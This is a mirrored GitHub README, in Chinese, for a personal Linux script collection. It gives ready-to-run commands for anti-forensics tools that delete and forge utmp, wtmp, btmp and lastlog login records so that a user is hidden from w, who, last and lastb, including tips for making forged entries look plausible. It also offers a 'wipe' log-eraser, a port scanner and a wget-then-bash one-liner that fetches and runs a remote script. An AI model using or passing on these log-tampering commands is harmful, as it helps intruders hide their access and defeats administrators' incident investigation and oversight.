Code Monkey home page Code Monkey logo

sh's Introduction

SH

我的 Linux 脚本

1、安装AutoSSH

wget -c -N --no-check-certificate "https://raw.githubusercontent.com/sunlewuyou/SH/master/autossh.sh" && bash autossh.sh

2、Linux脚印

wget -c https://raw.githubusercontent.com/sunlewuyou/SH/master/clean

  1. 删除utmp记录,将自己从w或者who输出中隐藏 python clean --mode delete --type utmp --user root //删除用户为root的用户记录 python clean --mode delete --type utmp --user root --host "58.47.251.255" //删除用户为root且登录来源host为58.47.251.255的用户记录
  2. 删除历史登录记录(wtmp),隐藏last的记录 python clean --mode delete --type wtmp --user root --host "111.30.32.213" //删除用户为root且登录来源host为111.30.32.213的用户记录
  3. 删除btmp记录,隐藏lastb的记录,lastb为登录失败的用户记录 python clean --mode delete --type btmp --user root --host "172.16.50.156" //删除用户为root且登录来源host为127.0.0.1的用户记录
  4. 删除lastlog记录,不能通过用户删除,只能通过host或者时间 python clean --mode delete --type lastlog --host "172.16.50.1" //删除来源host的用户登录记录 python clean --mode delete --type lastlog --date "2017-8-2 22:46:34" //删除登录时间为2017-8-2 22:46:34的用户登录记录

python clean --mode delete --type lastlog --date "2018-09-01 03:17:49" 六 9月 1 03:17:49 +0800 2018

伪造日志

  1. 伪造utmp记录,将自己从w或者who输出中伪造 python clean --mode add --type utmp --user nobody --tty "pts/8" --pid 25394 --date "2017-8-2 22:46:34" --host "127.0.0.1" //伪造用户为nobody的用户记录 这里伪造的时间和host可以通过who命令去找到,PID一般伪造bash或者ssh通过ps -aux | grep ssh/bash去寻找
  2. 伪造历史登录记录(wtmp),伪造last的记录 python clean --mode add --type wtmp --user root --tty "pts/7" --date "2017-8-2 00:06:34" --host "127.0.0.1"
  3. 伪造btmp记录,伪造lastb的记录,lastb为登录失败的用户记录 python clean --mode add --type btmp --user root --tty "pts/7" --date "2017-8-2 00:06:34" --host "127.0.0.1" //伪造用户为root且登录来源host为127.0.0.1的用户登录失败记录
  4. 伪造lastlog记录 python clean --mode add --type=lastlog --user=rootclay --date="2017-7-24 14:22:07" --tty "pts/2" --host "127.0.0.1" //伪造用户为rootclay 时间2017-7-24 14:22:07 来源登录ip为127.0.0.1的用户登录记录

3,wipe

wget -c https://raw.githubusercontent.com/sunlewuyou/SH/master/wipe

UTMP editing: Erase all usernames : wipe u [username] Erase one username on tty: wipe u [username] [tty]

WTMP editing: Erase last entry for user : wipe w [username] Erase last entry on tty : wipe w [username] [tty]

LASTLOG editing: Blank lastlog for user : wipe l [username] Alter lastlog entry : wipe l [username] [tty] [time] [host] Where [time] is in the format [YYMMddhhmm]

4,端口扫描

wget -c https://raw.githubusercontent.com/sunlewuyou/SH/master/portscan

使用:python portscan,然后输入需要扫描的IP即可。

其他语句查看指定端口占用情况:netstat -tunlp | grep 80

sh's People

Contributors

sunlewuyou avatar

Stargazers

avatar

Watchers

avatar avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.